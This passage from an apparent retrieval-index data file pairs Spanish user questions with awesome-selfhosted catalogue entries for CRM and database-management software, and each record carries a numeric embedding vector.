-0.11807, 0.05526, -0.02061, 0.09149, -0.06098, -0.01706, 0.04508, -0.04308, -0.09406, 0.09628, -0.04401, 0.02098, 0.04561, 0.00135, -0.00783, -0.04149, 0.14729, 0.08831, 0.0241, -0.00922, -0.00989, -0.09021, -0.11035, 0.04612, 0.02108, 0.00391, 0.11753, 0.05957, 0.02389, -0.03216, 0.08541, -0.00597, 0.00659, -0.02227, 0.06403, 0.05576, 0.13149, -0.0683, 0.02859, 0.02788, 0.04186, -0.08315, -0.12539, 0.06573, -0.08744, 0.06773, 0.05201, -0.09512, -0.05357, 0.04577, -0.07519, 0.03296, 0.00012, 0.05574, -0.02375, 0.06613, -0.02679, -0.03939, 0.03912, 0.01167, -0.09552, 0.0249, 0.06648, -0.03801, 0.04776, 0.04805, -0.02234, 0.09605, -0.02466, 0.15667, -0.02016, 0.02826, -0.01111, -0.03695, -0.03045, -0.11357, -0.07529, -0.03031, 0.01345, -0.1308, 0.0517, 0.03635, -0.01752, -0.0494, 0.09802, -0.06388, -0.08678, 8e-05, 0.07474, 0.05167, 0.03943, 0.07599, 0.04406, 0.05304, -0.00196, -0.04201, -0.0109, 0.03109, -0.01086, -0.03312, 0.02528, 0.01702, 0.02573, 0.00158, 0.037, -0.01228, 0.02166, 0.03512, 0.01643, 0.03311, -0.03956, -0.01617, 0.03606, -0.01378, 0.02977, -0.05979, 0.04942, -0.0889, 0.03509, -0.00353, -0.05401, 0.04168, 0.01991, 0.04268, -0.03991, -0.05496, -0.09565, 0.11667, -0.05699, -0.0613, -0.05566, 0.06441, -0.07201, 0.01984, 0.00184, -0.01416, -0.00359, -0.05587, 0.05354, -0.0079, 0.00513, -0.00836, 0.07559, -0.00412, 0.02731, 0.09634, 0.00818, 0.04672, 0.06504, 0.07588, -0.01406, 0.05677, -0.02106, 0.06517, -0.04094, 0.01022, 0.00468, 0.00949, 0.14246, 0.07725, -0.03216, 0.00721, -0.01982, 0.01824, 0.01623, -0.06124, -0.00654, -0.02054, 0.01978, -0.05797, 0.00754, -0.04426, 0.05169, -0.01619, 0.04172, -0.01229, 0.01316, 0.00992, 0.07507, -0.0771, 0.04524, 0.04061, 0.0314, 0.01897, -0.03585, -0.00191, -0.04892, 0.03902, 0.04026, -0.02166, -0.0033, -0.02281, -0.00407, -0.02051, -0.02673, 0.01173]} -{"tipo": "pregunta", "herramienta": "Customer Relationship Management (CRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Customer Relationship Management (CRM)", "tema": "customer relationship management (crm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Customer Relationship Management (CRM): Corteza β€” CRM including a unified workspace, enterprise messaging and a low code environment for rapidly and securely delivering records-based management solutions [Apache-2.0, Go]. Django-CRM β€” Analytical CRM with tasks management, email marketing and many more. Django CRM is built for individual use, businesses of any size or freelancers and is designed to provide easy customization and quick development [AGPL-3.0, Python]. EspoCRM β€” CRM with a frontend designed as a single page application, and a REST API [AGPL-3.0, PHP]. Krayin β€” CRM solution for SMEs and Enterprises for complete customer lifecycle management [MIT, PHP]. Monica β€” Personal relationship manager, and a new kind of CRM to organize interactions with your friends and family [AGPL-3.0, PHP/Docker]. SuiteCRM β€” The award-winning, enterprise-class open source CRM [AGPL-3.0, PHP]. Twenty β€” A modern CRM offering the flexibility of open source, advanced features, and a sleek design [AGPL-3.0, Docker].", "indexar": "con que puedo montar un sistema de gestiΓ³n de clientes sin gastar mucho dinero", "v": [-0.06492, 0.09468, -0.1221, -0.16315, -0.12853, 0.06474, -0.06077, 0.05956, -0.2094, -0.13989, -0.12679, -0.07392, 0.05113, -0.07857, 0.02702, -0.02612, -0.05157, -0.04983, 0.03836, 0.02577, 0.06117, -0.0864, 0.0837, -0.10506, -0.0485, 0.10649, 0.01912, -0.23022, -0.18342, 0.15455, 0.0582, -0.07349, 0.02964, -0.10725, -0.0467, -0.08295, 0.02186, 0.02827, 0.12049, -0.06323, 0.11434, 0.01004, 0.0448, -0.03193, 0.09095, -0.02516, 0.04009, -0.00936, 0.03551, 0.02048, -0.05255, -0.07939, -0.13588, 0.0061, 0.07813, -0.09176, -0.00101, -0.00634, 0.02934, -0.04752, -0.04049, 0.13138, 0.04426, 0.16716, -0.01939, 0.07734, 0.08223, 0.02072, -0.02382, 0.02837, -0.04155, -0.02167, -0.02298, 0.14204, 0.03674, -0.01694, 0.1385, -0.00501, -0.03504, 0.0134, -0.01914, -0.06441, -0.07984, 0.11542, -0.01457, -0.01623, 0.00452, -0.00646, 0.07044, 0.0566, -0.07503, -0.01588, 0.01807, 0.02772, -0.06624, 0.01274, 0.03119, -0.0028, -0.0652, 0.05198, -0.04465, -0.03185, -0.11679, 0.09507, 0.02861, 0.01533, 0.11871, -0.06871, 0.00236, -0.0617, -0.06843, 0.03591, -0.09919, -0.01047, -0.13247, -0.0699, 0.02005, 0.09214, -0.02201, 0.01776, -0.07151, -0.02698, 0.07364, 0.0051, 0.10276, 0.01301, 0.05741, 0.0701, 0.00867, 0.03214, 0.00381, 0.02588, -0.00326, 0.00511, -0.02537, -0.04091, -0.04995, 0.09279, -0.03125, -0.00307, -0.09268, -0.02076, -0.01441, -0.04942, 0.10793, -0.04731, 0.12267, -0.10244, -0.03045, 0.0129, 0.01715, 0.02372, 0.0249, -0.01501, -0.01082, 0.01534, 0.11561, 0.04429, -0.01198, -0.00577, 0.01258, 0.0486, 0.05735, 0.03858, -0.02672, -0.04429, -0.07966, 0.05795, 0.0058, 0.01656, 0.04126, 0.05063, 0.08405, 0.00107, 0.09615, -0.06463, 0.00212, -0.12639, 0.01468, -0.00531, 0.01165, -0.00048, -0.02365, 0.03418, -0.01368, 0.03832, 0.0172, 0.10464, -0.03364, 0.02105, 0.02544, 0.01697, -0.01466, 0.04875, 0.03706, -0.06462, -0.00931, -0.02965, 0.01045, 0.02663, -0.00901, -0.0052, 0.05015, -0.05303, -0.02902, 0.02035, -0.02081, 0.04988, 0.0129, 0.04985, 0.064, -1e-05, 0.01949, -0.04468, 0.01108, 0.01088, -0.01946, -0.02026, -0.06668, 0.01028, 0.03545, -0.00904, -0.01282, 0.05686, 0.01074, -0.02258, -0.06151, 0.04016, 0.0012, -0.04376, -0.0217, -0.03958, -0.05281, -0.01121, -0.04245, -0.01125, 0.02398, -0.03203, -0.05176, 0.01699, 0.03365, 0.10182, 0.01928, -0.02566, -0.02203, -0.01168, -0.06033, -0.03926, -0.0469, -0.04729, 0.03195, -0.00856, -0.04401, -0.00172, -0.00155, 0.00589]} -{"tipo": "pregunta", "herramienta": "Customer Relationship Management (CRM)", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Customer Relationship Management (CRM)", "tema": "customer relationship management (crm)", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Customer Relationship Management (CRM): Corteza β€” CRM including a unified workspace, enterprise messaging and a low code environment for rapidly and securely delivering records-based management solutions [Apache-2.0, Go]. Django-CRM β€” Analytical CRM with tasks management, email marketing and many more. Django CRM is built for individual use, businesses of any size or freelancers and is designed to provide easy customization and quick development [AGPL-3.0, Python]. EspoCRM β€” CRM with a frontend designed as a single page application, and a REST API [AGPL-3.0, PHP]. Krayin β€” CRM solution for SMEs and Enterprises for complete customer lifecycle management [MIT, PHP]. Monica β€” Personal relationship manager, and a new kind of CRM to organize interactions with your friends and family [AGPL-3.0, PHP/Docker]. SuiteCRM β€” The award-winning, enterprise-class open source CRM [AGPL-3.0, PHP]. Twenty β€” A modern CRM offering the flexibility of open source, advanced features, and a sleek design [AGPL-3.0, Docker].", "indexar": "cual es una alternativa libre a Salesforce para empresas pequeΓ±as", "v": [-0.00084, 0.08715, -0.01168, -0.0808, -0.10536, -0.1714, -0.03148, -0.11562, -0.18532, -0.0845, -0.07763, -0.14882, -0.05744, -0.02464, 0.12132, -0.04178, 0.03216, -0.17218, 0.09487, -0.05956, 0.00674, -0.07177, -0.10976, -0.0973, -0.02187, 0.0065, 0.05194, -0.00904, -0.16994, 0.08391, 0.10794, 0.01893, 0.06887, -0.04443, 0.00771, -0.01634, -0.01472, 0.05163, 0.17205, -0.13624, 0.13411, -0.03378, -0.09816, 0.01635, -0.00348, -0.02406, -0.09742, 0.05613, 0.03103, 0.08886, -0.1, 0.02447, -0.08139, -0.10129, 0.13732, 0.02162, 0.00818, -0.04451, -0.04111, 0.01128, -0.07844, 0.045, 0.01385, -0.11036, -0.01749, 0.03571, -0.0495, -0.0323, -0.03282, 0.03282, -0.00807, -0.05249, -0.10502, -0.12018, -0.08132, 0.0326, 0.03898, 0.07847, -0.08987, 0.03867, 0.07367, -0.01682, -0.13141, 0.08224, 0.02477, -0.08689, 0.02709, -0.01714, -0.04949, -0.02332, 0.02057, 0.00259, -0.01657, 0.01907, 0.01616, 0.00397, 0.03654, 0.05308, -0.07813, 0.08473, -0.02696, 0.04238, -0.09776, -0.08527, -0.07086, 0.01944, -0.12421, -0.04481, -0.11355, 0.02154, -0.04509, -0.02203, 0.01117, 0.03785, -0.00382, -0.00574, 0.01616, -0.10272, -0.04548, -0.00799, -0.02788, -0.05564, 0.03119, -0.044, -0.0738, 0.0004, 0.03868, 0.07242, -0.0051, -0.04351, 0.08656, -0.03495, -0.07507, -0.11078, -0.08116, 0.00012, 0.02232, -0.00332, 0.03565, -0.01404, 0.01739, -0.01787, 0.01138, -0.02411, 0.10841, 0.0137, 0.00625, -0.01407, 0.01774, 0.05642, 0.01444, 0.0052, -0.05628, 0.09409, -0.05426, 0.0405, -0.02607, -0.02622, 0.00603, 0.17201, 0.01926, -0.0212, -0.06715, -0.03125, 0.05296, -0.0708, -0.07946, -0.02952, -0.04564, 0.0365, -0.0251, 0.01009, 0.0803, -0.11873, 0.05769, -0.04945, -0.02808, -0.07929, -0.01308, -0.06564, 0.03968, 0.0617, -0.0874, 0.0502, 0.02185, 0.02157, -0.0024, -0.00482, 0.02394, 0.03025, -0.0532, -0.00632, -0.0307, -0.06694, -0.03628, -0.0256, -0.00951, -0.09085, 0.00909, -0.01492, -0.07011, -0.03691, -0.10865, -0.00423, -0.02851, 0.01354, -0.02571, 0.09077, 0.01402, 0.05751, 0.07234, 0.02281, 0.01973, 0.0418, -0.07269, -0.02695, -0.05219, -0.04621, 0.09636, 0.04708, 0.01287, 0.00291, 0.07724, -0.01397, -0.08541, 0.02604, 0.04793, -0.01836, -0.06408, 0.01378, -0.01344, 0.03379, -0.04062, -0.0103, 0.02581, -0.03188, -0.01466, 0.04024, 0.04371, -0.00855, 0.06493, 0.06518, -0.04304, 0.00836, -0.03521, -0.00422, -0.07941, -0.03532, -0.06991, -0.02349, -0.07065, 0.02652, 0.00761, 0.03731, 0.01464, -0.02779]} -{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Adminer β€” Database management in a single PHP file. Available for MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch, MongoDB and others [Apache-2.0/GPL-2.0, PHP]. Azimutt β€” Visual database exploration made for real world databases (big and messy). Explore your database schema as well as data, document them, extend them and even get analysis and guidelines [MIT, Elixir/Nodejs/Docker]. Baserow β€” Create your own database without technical experience (alternative to Airtable) [MIT, Docker]. Bytebase β€” Safe database schema change and version control for DevOps teams, supports MySQL, PostgreSQL, TiDB, ClickHouse, and Snowflake [MIT, Docker/K8S/Go]. Chartbrew β€” Connect directly to databases and APIs and use the data to create beautiful charts [MIT, Nodejs/Docker]. ChartDB β€” Database diagrams editor that allows you to visualize and design your DB with a single query [AGPL-3.0, Nodejs/Docker]. CloudBeaver β€” Manage databases, supports PostgreSQL, MySQL, SQLite and more. A web/hosted version of DBeaver [Apache-2.0, Docker].", "indexar": "que programa puedo usar para administrar mis bases de datos sin instalar nada complejo?", "v": [-0.03739, 0.12534, -0.14283, -0.21607, 0.0626, -0.07145, -0.01478, -0.09807, -0.28656, -0.01573, -0.07357, -0.1302, -0.03937, -0.05739, 0.01962, -0.06874, 0.04662, -0.15694, 0.03898, -0.01289, 0.0278, -0.0571, -0.00783, -0.02906, -0.13024, 0.0716, 0.03102, -0.06589, -0.12333, -0.05906, -0.01286, 0.03331, 0.04645, -0.04591, -0.00193, 0.00211, -0.05977, -0.02552, 0.00518, 0.00525, -0.00871, 0.02503, -0.00063, 0.11008, 0.11434, -0.03355, 0.03469, -0.07237, 0.04673, -0.11865, -0.04586, 0.02545, -0.06363, -0.07419, 0.07568, -0.16773, 0.05769, -0.166, 0.03332, 0.11564, -0.0863, 0.10687, 0.03744, 0.10952, 0.0203, -0.02456, 0.09354, 0.00424, -0.11585, 0.06504, -0.00551, 0.09603, 0.01149, -0.04471, -0.0138, 0.04842, 0.04885, -0.04849, 0.06911, -0.0122, -0.05912, -0.01948, 0.01322, 0.06281, -0.12949, -0.0988, 0.06608, -0.05056, -0.01921, -0.05596, 0.04116, -0.03488, -0.045, 0.00254, 0.08314, -0.04531, 0.09735, 0.04153, 0.02519, 0.08244, 0.0265, 0.01779, 0.03327, 0.08668, -0.04452, 0.04046, 0.12012, -0.04586, -0.02038, -0.0924, -0.06305, -0.04135, -0.05585, -0.06253, -0.01481, 0.02797, 0.0157, -0.01986, -0.05194, -0.01228, -0.0226, -0.05529, 0.02725, 0.00523, 0.08609, -0.06689, -0.01094, 0.09133, 0.02179, 0.1355, -0.04823, -0.04248, -0.02311, -0.01655, 0.00243, 0.02463, -0.04864, -0.01384, -0.01232, -0.07569, -0.02051, 0.12902, -0.04389, -0.00149, 0.05351, 0.00946, 0.01432, -0.01003, 0.01664, -0.01774, 0.06748, 0.0123, 0.0396, 0.08644, -0.11855, -0.02481, 0.12398, -0.06892, 0.00079, 0.00037, -0.02121, 0.00881, -0.03157, -0.00723, 0.05149, -0.09334, -0.02614, -0.00571, 0.06024, 0.13002, -0.02938, 0.11496, 0.05397, -0.05086, 0.06603, -0.04343, -0.07108, -0.06986, -0.01412, 0.00135, -0.05996, 0.01301, 0.0335, 0.03176, -0.02049, -0.01519, -0.06321, 0.01761, -0.01976, -0.01298, 0.03845, 0.09682, 0.01616, -0.02759, 0.03688, -0.0239, -0.03603, -0.02697, 0.03014, -0.0255, -0.0089, 0.08253, -0.05206, 0.00221, 0.07309, 0.0728, -0.04403, -0.00512, 0.07749, 0.06733, 0.03977, -0.02487, 0.02628, -0.01364, -0.05961, -0.05058, 0.01864, 0.06107, 0.05534, 0.01006, -0.03403, 0.05026, 0.03852, -0.00312, -0.02569, -0.05602, -0.00156, 0.03174, 0.03838, 0.01248, -0.02783, -0.01077, -0.0153, -0.03264, 0.01063, -0.04107, -0.00768, -0.02566, -0.01854, -0.0513, 0.00513, 0.09959, -0.0136, -0.05487, -0.0404, -0.01522, -0.07259, 0.06785, -0.02971, -0.03982, -0.02972, 0.01158, 0.0539, -0.07389, 0.01973, 0.03901]} -{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Adminer β€” Database management in a single PHP file. Available for MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch, MongoDB and others [Apache-2.0/GPL-2.0, PHP]. Azimutt β€” Visual database exploration made for real world databases (big and messy). Explore your database schema as well as data, document them, extend them and even get analysis and guidelines [MIT, Elixir/Nodejs/Docker]. Baserow β€” Create your own database without technical experience (alternative to Airtable) [MIT, Docker]. Bytebase β€” Safe database schema change and version control for DevOps teams, supports MySQL, PostgreSQL, TiDB, ClickHouse, and Snowflake [MIT, Docker/K8S/Go]. Chartbrew β€” Connect directly to databases and APIs and use the data to create beautiful charts [MIT, Nodejs/Docker]. ChartDB β€” Database diagrams editor that allows you to visualize and design your DB with a single query [AGPL-3.0, Nodejs/Docker]. CloudBeaver β€” Manage databases, supports PostgreSQL, MySQL, SQLite and more. A web/hosted version of DBeaver [Apache-2.0, Docker].", "indexar": "con que herramienta puedo visualizar y explorar mi esquema de base de datos fΓ‘cilmente?", "v": [-0.0683, 0.15013, -0.26248, -0.19958, 0.0128, -0.07197, -0.0986, -0.01172, -0.0779, -0.11522, 0.01236, -0.07054, -0.0717, -0.07044, 0.12077, 0.08139, 0.11438, -0.07526, -0.07515, -0.04617, 0.01786, -0.06911, -0.13287, 0.02112, -0.19956, -0.02057, -0.01196, -0.03212, -0.10311, 0.03656, -0.01065, 0.09066, -0.01987, -0.03395, -0.03467, -0.04246, 0.00757, 0.04038, 0.00411, -0.09052, -0.03104, 0.03395, -0.09175, 0.08812, 0.07936, -0.03058, -0.05704, -0.00084, -0.0872, -0.04472, -0.04881, -0.06837, -0.19263, -0.07341, 0.0027, -0.09819, 0.17477, -0.07508, 0.12663, 0.11649, -0.04037, -0.04755, 0.00386, -0.04756, -0.01696, -0.04762, 0.05908, -0.01548, -0.0662, 0.10021, -0.0125, 0.05718, -0.02833, -0.00032, 0.02307, 0.03073, 0.075, -0.03189, 0.033, 0.04207, -0.00799, -0.02286, -0.11064, 0.12054, -0.08175, -0.06312, 0.0376, 0.01474, 0.05952, -0.04335, 0.00656, 0.01104, -0.04622, 0.05885, -0.02834, 0.0519, 0.03501, -0.01764, -0.00165, 0.05996, 0.08751, 0.0323, -0.07665, 0.13915, 0.0406, 0.01704, 0.03935, 0.02755, -0.12086, -0.01158, -0.02985, -0.01155, -0.10264, -0.00901, 0.00428, -0.03449, -0.08153, -0.00237, -0.04198, -0.08049, 0.04364, 0.06374, -0.07187, -0.06598, 0.03844, -0.06795, -0.06611, 0.11998, 0.00377, -0.01559, 0.03992, 0.01739, -0.0833, 0.09714, 0.06467, 0.05532, -0.02967, -0.12072, 0.03638, -0.04796, -0.01199, 0.07732, -0.00223, -0.04292, 0.08077, -0.0382, 0.08318, -0.0091, -0.0558, 0.03053, -0.03193, 0.00069, 0.06272, 0.09148, -0.02449, 0.02899, 0.05008, 0.01992, -0.06703, 0.00673, -0.01944, 0.01772, 2e-05, 0.02645, 0.0074, -0.08389, 0.06027, -0.01765, 0.01029, -0.00336, -0.05467, 0.05936, 0.08694, -0.04137, 0.04182, -0.05078, -0.09419, -0.0662, -0.0707, -0.04189, -0.00961, -0.02871, -0.04226, -0.05122, 0.01223, -0.03729, 0.01099, 0.00906, 0.00823, -0.02443, -0.00141, 0.08997, 0.05076, -0.03731, 0.01976, -0.02651, -0.01695, 0.00514, 0.05774, -0.02925, -0.05266, 0.03207, 0.00325, -0.06927, -0.0226, 0.07212, -0.01047, -0.036, 0.00539, -0.00785, 0.05306, -0.03256, 0.0529, -0.08952, -0.04148, 0.00333, 0.04947, 0.01706, 0.02588, -0.00055, -0.01784, 0.10586, 0.0732, 0.00503, -0.03797, -0.03044, -0.00193, 0.01439, -0.00581, -0.03212, 0.01723, -0.00997, -0.00019, 0.01857, 0.0483, -0.05578, 0.00545, -0.05552, -0.05886, -0.03287, 0.04723, 0.05726, 0.01036, -0.05346, -0.01701, -0.03301, -0.05771, 0.02373, -0.02528, -0.09091, -0.06091, 0.01016, 0.08107, -0.07391, -0.00393, -0.02374]} -{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: Adminer β€” Database management in a single PHP file. Available for MySQL, MariaDB, PostgreSQL, SQLite, MS SQL, Oracle, Elasticsearch, MongoDB and others [Apache-2.0/GPL-2.0, PHP]. Azimutt β€” Visual database exploration made for real world databases (big and messy). Explore your database schema as well as data, document them, extend them and even get analysis and guidelines [MIT, Elixir/Nodejs/Docker]. Baserow β€” Create your own database without technical experience (alternative to Airtable) [MIT, Docker]. Bytebase β€” Safe database schema change and version control for DevOps teams, supports MySQL, PostgreSQL, TiDB, ClickHouse, and Snowflake [MIT, Docker/K8S/Go]. Chartbrew β€” Connect directly to databases and APIs and use the data to create beautiful charts [MIT, Nodejs/Docker]. ChartDB β€” Database diagrams editor that allows you to visualize and design your DB with a single query [AGPL-3.0, Nodejs/Docker]. CloudBeaver β€” Manage databases, supports PostgreSQL, MySQL, SQLite and more. A web/hosted version of DBeaver [Apache-2.0, Docker].", "indexar": "cual es una alternativa libre a Airtable para crear mi propia base de datos?", "v": [-0.12751, 0.09545, -0.05196, -0.0415, -0.03711, -0.0355, 0.02402, -0.04676, -0.21814, -0.03675, -0.07365, -0.24694, -0.06174, -0.04181, 0.11341, -0.09084, 0.06073, -0.13626, 0.12644, -0.00187, -0.06037, 0.0199, -0.10301, -0.07884, -0.16012, -0.06668, 0.08183, 0.01371, -0.1349, 0.08568, -0.00367, 0.05246, 0.00549, 0.02276, 0.00322, -0.02516, 0.08513, 0.08434, -0.0254, -0.12297, 0.03389, -0.0521, -0.05095, 0.22553, 0.01283, 0.04109, -0.03234, 0.01877, -0.03626, 0.04311, -0.06931, -0.00538, -0.04854, 0.01428, 0.06136, -0.11509, 0.15052, -0.16253, -0.0077, 0.0195, -0.16029, 0.0349, 0.05186, -0.01933, -0.00742, 0.00501, -0.01465, -0.02778, -0.04531, 0.09563, 0.06491, 8e-05, 0.01401, -0.09082, -0.00631, -0.00293, 0.02897, -0.01125, -0.03669, 0.00419, -0.00938, -0.08867, -0.06412, 0.02843, -0.0146, -0.04365, 0.11487, -0.02378, -0.00911, 0.07576, 0.07978, 0.01426, -0.03556, 0.13831, -0.04148, -0.04907, 0.02765, 0.00709, -0.05485, 0.05038, -0.00096, 0.05118, -0.0723, 0.02721, 0.0757, -0.00262, 0.01714, -0.00538, -0.11463, 0.03033, -0.03398, -0.02162, -0.01035, -0.01431, 0.0214, -0.0833, -0.03481, 0.01687, -0.02345, 0.03056, 0.03384, -0.08524, 0.00449, -0.10531, -0.04748, 0.02101, -0.01369, 0.06849, -0.05016, 0.12965, 0.05785, 0.00425, -0.08176, -0.08734, 0.01269, 0.04336, -0.02606, -0.07845, 0.05941, -0.05236, -0.01546, 0.07202, -0.03371, -0.01926, 0.00618, -0.05216, 0.01749, 0.01411, -0.05386, -0.00035, -0.10983, 0.07145, 0.05137, 0.09438, -0.10145, 0.07132, -0.02617, -0.03092, -0.07255, 0.05788, 0.0453, 0.02286, -0.01137, 0.00196, 0.05284, -0.09377, 0.00917, -0.03265, 0.00035, 0.05605, -0.08317, 0.04298, 0.08027, -0.07952, 0.10661, -0.06219, -0.05138, -0.12774, -0.02525, -0.04154, 0.03034, -0.01147, -0.04338, -0.04708, 0.00574, -0.09227, 0.06772, -0.01304, 0.03276, 0.00509, -0.08128, 0.03533, -0.00265, -0.05812, -0.02345, -0.07529, 0.01552, -0.08759, 0.04885, -0.0123, -0.08649, 0.01331, -0.0335, -0.00917, 0.0121, -0.03283, -0.01334, 0.02838, 0.03454, -0.02641, 0.04931, 0.00298, 0.07482, 0.00111, -0.02772, 0.01423, 0.06105, -0.03384, 0.05775, -0.03884, 0.02768, 0.03611, 0.04439, -0.00851, -0.02364, 0.01436, 0.01978, 0.02293, 0.01744, -0.02658, 0.02395, -0.02458, 0.04831, -0.03789, 0.01761, 0.00115, 0.02296, 0.02241, 0.00709, -0.05155, 0.06911, 0.09872, -0.06595, -0.05113, -0.01731, 0.00565, -0.08254, 0.04175, -0.0392, -0.07814, -0.02849, -0.00991, 0.03929, -0.01018, 0.01017, -0.01134]} -{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: d9 β€” Turn SQL databases into secure APIs through an intuitive admin interface. Data platform and headless CMS (fork of Directus) [GPL-3.0, Nodejs]. Databunker β€” Network-based, self-hosted, GDPR compliant, secure database for personal data or PII [MIT, Docker]. Datasette β€” Explore and publish data with easy import and export and database management [Apache-2.0, Python/Docker]. Evidence β€” Code-based BI tool. Write reports using SQL and markdown and they render as a website [MIT, Nodejs]. LibreDB Studio β€” Browser-based SQL IDE for PostgreSQL, MySQL, Oracle, SQL Server, SQLite, MongoDB and Redis, with an optional AI assistant that writes SQL from natural language (alternative to DataGrip, DBeaver) [MIT, Docker/K8S]. Limbas β€” Database framework for creating database-driven business applications. As a graphical database frontend, it enables the efficient processing of data stocks and the flexible development of comfortable database applications [GPL-2.0, PHP].", "indexar": "que programa sirve para convertir bases de datos SQL en APIs seguras?", "v": [-0.06322, -0.05735, -0.12807, -0.176, 0.01921, -0.29905, 0.04507, -0.23954, -0.07161, 0.08449, -0.08294, -0.13905, -0.01391, -0.1255, -0.00469, -0.0004, 0.02484, -0.14614, 0.0408, 0.10531, 0.16217, -0.04748, -0.03587, -0.07173, -0.0681, 0.02055, 0.10829, 0.01954, -0.0466, -0.00897, -0.04757, -0.04791, -0.0199, 0.0058, -0.05062, 0.01364, -0.12665, 0.0545, -0.04928, -0.0851, 0.01236, -0.07054, -0.10607, -0.02738, 0.11012, 0.03633, 0.07786, 0.00298, 0.06386, -0.15465, -0.07313, -0.00875, -0.11207, -0.06647, -0.02733, -0.08238, -0.00169, -0.07823, 0.00938, 0.10728, -0.1349, -0.0617, 0.0555, -0.01635, 0.02314, 0.01314, 0.0886, 0.00802, -0.06506, 0.09299, -0.0367, 0.00807, 0.01293, -0.03624, 0.00949, -0.0509, 0.08739, -0.01035, 0.02502, 0.05966, -0.09011, 0.01079, -0.0627, 0.11326, 0.03576, -0.00161, 0.03162, 0.00434, -0.00913, -0.00648, 0.06141, 0.0117, 0.01404, 0.10962, 0.06795, -0.00021, 0.04065, -0.03126, 0.01455, 0.04013, -0.02486, -0.05687, -0.06225, 0.06289, 0.0554, 0.11658, 0.12782, 0.01045, 0.01438, -0.02783, -0.00279, 0.00201, -0.08666, -0.05449, 0.01028, 0.0822, 0.02074, -0.01211, 0.02644, 0.02233, -0.02516, -0.03556, 0.02599, 0.0336, -0.01917, 0.00545, -0.07829, 0.12124, 0.0322, 0.05311, -0.0267, -0.01901, -0.07379, 0.04576, -0.01129, 0.05591, 0.08495, -0.05301, -0.01519, -0.05185, -0.03417, 0.08247, -0.03517, 0.00932, 0.02501, -0.03972, 0.07622, 0.01842, -0.06095, -0.0264, 0.03178, -0.01039, 0.00656, 0.04732, -0.11028, -0.01883, 0.00795, -0.07496, -0.07683, 0.06943, 0.03989, 0.05302, -0.01569, -0.03037, 0.06096, -0.03261, 0.05617, -0.03865, 0.10415, 0.08181, 0.02728, 0.07161, 0.09666, -0.14675, 0.04671, 0.02736, -0.07648, -0.05596, -0.00104, -0.05903, -0.05703, -0.01509, 0.04078, 0.00377, 0.01655, -0.03215, 0.01503, 0.00063, 0.02718, -0.041, -0.04994, 0.08701, 0.02656, -0.04757, 0.03482, -0.07275, -0.04791, -0.00616, 0.01029, -0.04979, -0.0587, 0.01625, -0.05151, -0.02492, 0.00979, 0.06264, -0.03109, 0.0005, 0.03452, -0.02747, -0.00626, -0.00171, 0.01692, 0.00348, -0.01062, -0.08523, 0.01872, 0.03803, 0.01675, 0.059, -0.08541, 0.01751, 0.02117, -0.00997, 0.00377, -0.04459, 0.03125, -0.03215, 0.01368, 0.01738, 0.04864, -0.01703, 0.00045, -0.01733, 0.04446, 0.0072, -0.04994, -0.04589, 0.01121, -0.09829, 0.00047, 0.06133, -0.08143, -0.05924, -0.00409, -0.00487, -0.09431, 0.05551, 0.00871, -0.05253, -0.07, -0.00815, 0.04798, 0.00161, 0.00545, -0.02166]} -{"tipo": "pregunta", "herramienta": "Database Management", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Database Management", "tema": "database management", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Database Management: d9 β€” Turn SQL databases into secure APIs through an intuitive admin interface. Data platform and headless CMS (fork of Directus) [GPL-3.0, Nodejs]. Databunker β€” Network-based, self-hosted, GDPR compliant, secure database for personal data or PII [MIT, Docker]. Datasette β€” Explore and publish data with easy import and export and database management [Apache-2.0, Python/Docker]. Evidence β€” Code-based BI tool. Write reports using SQL and markdown and they render as a website [MIT, Nodejs]. LibreDB Studio β€” Browser-based SQL IDE for PostgreSQL, MySQL, Oracle, SQL Server, SQLite, MongoDB and Redis, with an optional AI assistant that writes SQL from natural language (alternative to DataGrip, DBeaver) [MIT, Docker/K8S]. Limbas β€” Database framework for creating database-driven business applications. As a graphical database frontend, it enables the efficient processing of data stocks and the flexible development of comfortable database applications [GPL-2.0, PHP].", "indexar": "cual es una alternativa libre a DataGrip que funcione en el navegador y tenga asistente IA?", "v": [0.00585, 0.04812, -0.2277, -0.08861, 0.09773, -0.05873, -0.01577, -0.06925, -0.22616, 0.00666, -0.01179, -0.21119, -0.05767, 0.05022, 0.1363, -0.03481, 0.07437, -0.05804, 0.06907, -0.0083, -0.0744, 0.01511, -0.03259, 0.00046, -0.04994, -0.04504, 0.01007, 0.0469, -0.08923, -0.0474, 0.01372, -0.07894, 0.07867, -0.08702, -0.01829, -0.058, -0.00159, 0.0448, 0.07533, -0.10558, 0.10067, -0.05097, -0.11538, 0.09715, -0.04079, 0.03146, -0.00247, 0.00837, 0.03488, 0.05412, -0.19065, -0.05457, -0.06866, -0.06596, -0.07742, 0.03096, 0.17126, -0.20756, -0.00366, -0.00604, -0.00988, 0.02943, -0.04848, 0.01305, 0.06469, 0.02413, 0.03881, -0.11138, 